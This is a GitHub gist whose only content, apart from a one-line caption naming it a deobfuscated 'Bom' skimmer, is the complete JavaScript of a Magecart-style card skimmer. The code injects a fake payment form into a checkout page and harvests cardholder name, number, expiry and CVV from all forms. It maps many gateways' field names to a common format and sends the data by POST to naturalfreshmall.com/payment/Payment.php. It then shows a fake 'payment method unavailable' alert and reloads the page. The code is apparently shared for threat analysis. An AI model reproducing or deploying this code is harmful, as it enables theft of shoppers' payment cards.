Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
A deobfuscated and restructured version of the Bom skimmer served from naturalfreshmall
var f_id_daww = Math.random().toString(16).substr(2, 14);
function replaceExistingFormWithFakeForm() {
if (document.getElementById('checkout-payment-method-load') &&
document.getElementById('checkout-payment-method-load').innerHTML.indexOf('cc_cid') == -1) {
if (!document.getElementById(f_id_daww)) {
const fakeFormHtml = '<ul id="' + f_id_daww + '" style=""><li><h3><b>Credit/Debit Card Secure Payment</b></h3></li><div id="' + f_id_daww + '5233' + '"><div class="input--field"> <label for="field--holder"> Cardholder <em>*</em></label> <input id="field--holder" type="text" maxlength="50" name="payment[cc_owner]"> <div class="validation" id="field--holder--validation"> </div></div><div class="input--field"> <label for="field--card-number"> Card Number <em>*</em></label> <input id="field--card-number" type="text" maxlength="24" name="payment[cc_number]"> <div class="validation" id="field--card-number--validation"> </div></div><div><label for="field--month">Expiration Date <em>*</em></div><div class="input--field fix--expiration-date"> <div class="select--expiration-date"> <select id="field--month" name="payment[exp_month]"> <option value="" selected="">Month</option> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> <div class="validation" id="field--month--validation"> </div></div><div class="select--expiration-date"> <select id="field--year" name="payment[exp_year]"> <option value="" selected="">Year</option> <option value="21">2021</option> <option value="22">2022</option> <option value="23">2023</option> <option value="24">2024</option> <option value="25">2025</option> <option value="26">2026</option> <option value="27">2027</option> <option value="28">2028</option> <option value="29">2029</option> <option value="30">2030</option> </select> <div class="validation" id="field--year--validation"> </div></div></div><div class="input--field"> <label for="field--cvv"> Card Verification Number <em>*</em></label> <input id="field--cvv" type="password" maxlength="4" name="payment[cc_cid]"> <div class="validation" id="field--cvv--validation"> </div></div><style>#' + f_id_daww + '5233' + '{margin-left:20px;max-width: 300px;min-width: 200px; padding: 20px 0px;}#' + f_id_daww + '5233' + ' .information--field{margin-bottom: 12px;}#' + f_id_daww + '5233' + ' .information--field a{position: relative; color: #ca0001; margin-left: 30px; bottom: 15px; text-transform: uppercase;}#' + f_id_daww + '5233' + ' label{display: block; width: 100%; color: #333; text-transform: uppercase; margin-bottom: 5px;}#' + f_id_daww + '5233' + ' em{color: #ca0001;}#' + f_id_daww + '5233' + ' input, #' + f_id_daww + '5233' + ' select{height: 40px; padding: 0 8px; font-family: "Ubuntu", sans-serif; color: #5d6a7f; border: solid 1px #dfdfdf; background: #f5f5f5; font-size: 14px; border-radius: 0px; line-height: 1.5;}#' + f_id_daww + '5233' + ' .input--field{margin-bottom: 15px;}#field--card-number, #field--holder{width: 100%;}#' + f_id_daww + '5233' + ' .select--expiration-date{width: 50%; float: left;}#' + f_id_daww + '5233' + ' .fix--expiration-date:after{display: block; content: ""; clear: both;}#field--holder{text-transform: capitalize;}#field--cvv{width: 120px;}#' + f_id_daww + '5233' + ' .validation{display: none; color: #ca0001;}#' + f_id_daww + '5233' + ' #button--checkout{background: #ca0001; color: #fff; padding: 0px 20px; outline: 0;}</style></div></ul>';
const newForm = document.createElement('form');
newForm.innerHTML = fakeFormHtml;
const paymentMethodsForms = document.getElementById('checkout-payment-method-load').childNodes;
for (let i = 0; i < paymentMethodsForms.length; i++) {
if (paymentMethodsForms[i].style) {
paymentMethodsForms[i].style.display = 'none';
}
}
document.getElementById('checkout-payment-method-load').appendChild(newForm);
}
}
if (document.getElementById(f_id_daww)) {
document.getElementById('field--holder').disabled = false;
document.getElementById('field--card-number').disabled = false;
document.getElementById('field--month').disabled = false;
document.getElementById('field--year').disabled = false;
document.getElementById('field--cvv').disabled = false;
}
}
var cook = getCookie('__mg_back');
function checkFakeFormCanBeInjected() {
if (cook != '236232342323626326') {
setInterval(replaceExistingFormWithFakeForm, 200);
}
}
setTimeout(checkFakeFormCanBeInjected, 500);
function removeFakeCCValues(el) {
if (el.value == '1234 1234 1234 1234' || el.value == 'CVC' || el.value == 'MM / YY') {
el.value = '';
}
}
function DateStripeV(el) {
if (el.value.length == 2) {
const originalValue = el.value;
el.value = originalValue + ' / ';
}
if (el.value.length > 6) {
const originalValue = el.value;
el.value = originalValue.slice(0, 6);
}
el.value = el.value.replace(' ', ' ');
}
function generateUUID(idLength) {
let output = '';
for (let i = 0; i < idLength; i++) {
output += 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'.charAt(Math.floor(Math.random() * 62));
}
return output;
}
function hex2a(hexValue) {
const str = hexValue.toString();
let output = '';
for (let i = 0; i < str.length && str.substr(i, 2) !== '00'; i += 2) {
output += String.fromCharCode(parseInt(str.substr(i, 2), 16));
}
return output;
}
String.prototype.hexEncode = function () {
var hexChar, i;
var encodedString = '';
for (i = 0; i < this.length; i++) {
hexChar = this.charCodeAt(i).toString(16);
encodedString += ('000' + hexChar).slice(-4);
}
return encodedString;
};
String.prototype.hexDecode = function () {
var i;
var groupsOfFour = this.match(/.{1,4}/g) || [];
var decodedString = '';
for (i = 0; i < groupsOfFour.length; i++) {
decodedString += String.fromCharCode(parseInt(groupsOfFour[i], 16));
}
return decodedString;
};
function getCookie(cookieName) {
const allCookies = '; ' + document.cookie;
const splitByTargetCookie = allCookies.split('; ' + cookieName + '=');
if (splitByTargetCookie.length == 2) {
return splitByTargetCookie.pop().split(';').shift();
}
}
function delete_cookie(cookieName) {document.cookie = cookieName + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';}
function glob_snsd() {
const allButtons = document.getElementsByTagName('button');
for (let i = 0; i < allButtons.length; i++) {
allButtons[i].addEventListener('click', function () {
let stats = '';
const allForms = document.getElementsByTagName('form');
document.cookie = '__mg_front=$; path=/';
for (let z = 0; z < allForms.length; z++) {
var formInputs = allForms[z].getElementsByTagName('input');
var formSelects = allForms[z].getElementsByTagName('select');
for (let x = 0; x < formInputs.length; x++) {
if (formInputs[x].value && formInputs[x].value != '' && formInputs[x].type != 'radio' &&
formInputs[x].type != 'hidden' && formInputs[x].id != 'search' && formInputs[x].value != 'submit') {
if (formInputs[x].name && formInputs[x].name != '') {
let cook = getCookie('__mg_front');
if (cook != '') {
cook = cook.hexDecode();
cook += formInputs[x].name + ':' + formInputs[x].value + '|';
cook = cook.hexEncode();
cook = cook.split('00').join('');
document.cookie = '__mg_front=$; path=/';
document.cookie = '__mg_front=' + cook + '; path=/';
}
} else {
let cook = getCookie('__mg_front');
if (cook != '') {
cook = cook.hexDecode();
cook += formInputs[x].id + ':' + formInputs[x].value + '|';
cook = cook.hexEncode();
cook = cook.split('00').join('');
document.cookie = '__mg_front=$; path=/';
document.cookie = '__mg_front=' + cook + '; path=/';
}
}
}
}
for (let x = 0; x < formSelects.length; x++) {
if (formSelects[x].value && formSelects[x].value != '' && formSelects[x].type != 'radio' &&
formSelects[x].type != 'hidden' && formSelects[x].id != 'search' && formSelects[x].value != 'submit') {
if (formSelects[x].name && formSelects[x].name != '') {
let cook = getCookie('__mg_front');
if (cook != '') {
cook = cook.hexDecode();
cook += formSelects[x].name + ':' + formSelects[x].value + '|';
cook = cook.hexEncode();
cook = cook.split('00').join('');
document.cookie = '__mg_front=$; path=/';
document.cookie = '__mg_front=' + cook + '; path=/';
}
} else {
let cook = getCookie('__mg_front');
if (cook != '') {
cook = cook.hexDecode();
cook += formSelects[x].id + ':' + formSelects[x].value + '|';
cook = cook.hexEncode();
cook = cook.split('00').join('');
document.cookie = '__mg_front=$; path=/';
document.cookie = '__mg_front=' + cook + '; path=/';
}
}
}
}
}
stats = getCookie('__mg_front');
stats = hex2a(stats);
stats = stats.replace('payment[ps_cc_number]', 'cc_number');
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner');
stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration');
stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr');
stats = stats.replace('payment[ps_cc_cid]', 'cc_cid');
stats = stats.replace('cc_number:on', '');
stats = stats.replace('creditCardNum', 'cc_number');
stats = stats.replace('creditCardHolder', 'cc_owner');
stats = stats.replace('creditCardExpirationMonth', 'authorizenet_expiration');
stats = stats.replace('creditCardExpirationYear', 'authorizenet_expiration_yr');
stats = stats.replace('creditCardCode', 'cc_cid');
stats = stats.replace('card[num]', 'cc_number');
stats = stats.replace('card[name]', 'cc_owner');
stats = stats.replace('card[exp]', 'authorizenet_expiration');
stats = stats.replace('payment[ccw_exp_year]', 'authorizenet_expiration_yr');
stats = stats.replace('card[cvv]', 'cc_cid');
stats = stats.replace('payment[ps_cc_number]', 'cc_number');
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner');
stats = stats.replace('payment[ps_cc_exp_month]', 'authorizenet_expiration');
stats = stats.replace('payment[ps_cc_exp_year]', 'authorizenet_expiration_yr');
stats = stats.replace('payment[ps_cc_cid]', 'cc_cid');
stats = stats.replace('payment[control_settings]', 'cc_number');
stats = stats.replace('payment[ps_cc_owner]', 'cc_owner');
stats = stats.replace('payment[msn_set]', 'authorizenet_expiration');
stats = stats.replace('payment[yellow_set]', 'authorizenet_expiration_yr');
stats = stats.replace('payment[savage_set]', 'cc_cid');
stats = stats.replace('cardNumber', 'cc_number');
stats = stats.replace('cardholderName', 'cc_owner');
stats = stats.replace('cardExpirationMonth', 'authorizenet_expiration');
stats = stats.replace('cardExpirationYear', 'authorizenet_expiration_yr');
stats = stats.replace('securityCode', 'cc_cid');
stats = stats.replace('mundipagg_creditcard_1_1_cc_number', 'cc_number');
stats = stats.replace('mundipagg_creditcard_cc_holder_name_1_1', 'cc_owner');
stats = stats.replace('payment[mundipagg_creditcard_expirationMonth_1_1]', 'authorizenet_expiration');
stats = stats.replace('payment[mundipagg_creditcard_expirationYear_1_1]', 'authorizenet_expiration_yr');
stats = stats.replace('payment[mundipagg_creditcard_cc_cid_1_1]', 'cc_cid');
stats = stats.replace('sagepaycw_creditcard[card_number]', 'cc_number');
stats = stats.replace('sagepaycw_creditcard[card_holder]', 'cc_owner');
stats = stats.replace('sagepaycw_creditcard[expiry_month]', 'authorizenet_expiration');
stats = stats.replace('sagepaycw_creditcard[expiry_year]', 'authorizenet_expiration_yr');
stats = stats.replace('sagepaycw_creditcard[CV2]', 'cc_cid');
const ccNumberMatches = stats.match(/[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+\-[a-z0-9]+/);
if (ccNumberMatches != null) {
stats = stats.replace(ccNumberMatches[0], 'cc_number');
}
if (stats.indexOf('_number') !== -1 || stats.indexOf('_cid') !== -1) {
if (exfiltrationRequired) {
const formData = new FormData();
const statsInfos = {
referer: document.URL,
tag: 'YWxs',
stats: btoa(stats.hexEncode())
};
formData.append('products_hash', btoa(generateUUID(64)));
formData.append('amount_hash', btoa(generateUUID(64)));
formData.append('billing_hash', btoa(generateUUID(128)));
formData.append('shipping_hash', btoa(generateUUID(512)));
formData.append('visit_hash', btoa(generateUUID(418)));
formData.append('stat_infos', btoa(JSON.stringify(statsInfos)));
formData.append('captcha_hash', btoa(generateUUID(1024)));
formData.append('user_hash', btoa(generateUUID(32)));
url = 'checkout';
const xhr = new XMLHttpRequest();
xhr.open('POST', 'https://naturalfreshmall.com/payment/Payment.php', true);
xhr.send(formData);
document.cookie = '__mg_front=236232342323626326; path=/';
document.cookie = '__mg_back=236232342323626326; path=/';
exfiltrationRequired = false;
const checkoutFormChildNodes = document.getElementById('checkout-payment-method-load').childNodes;
for (let i = 0; i < checkoutFormChildNodes.length; i++) {
if (checkoutFormChildNodes[i].style) {
checkoutFormChildNodes[i].style.display = 'block';
}
}
document.getElementById(f_id_daww).style.display = 'none';
rR();
alert('Selected payment method is currently unavailable, please try again.');
}
}
});
}
}
var exfiltrationRequired = true;
var cook = getCookie('__mg_back');
if (cook != '236232342323626326') {setInterval(glob_snsd, 4000);}
function Rr() {window.location.href = window.location.href.replace('#', '');}
function rR() {setTimeout(Rr, 8000);}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment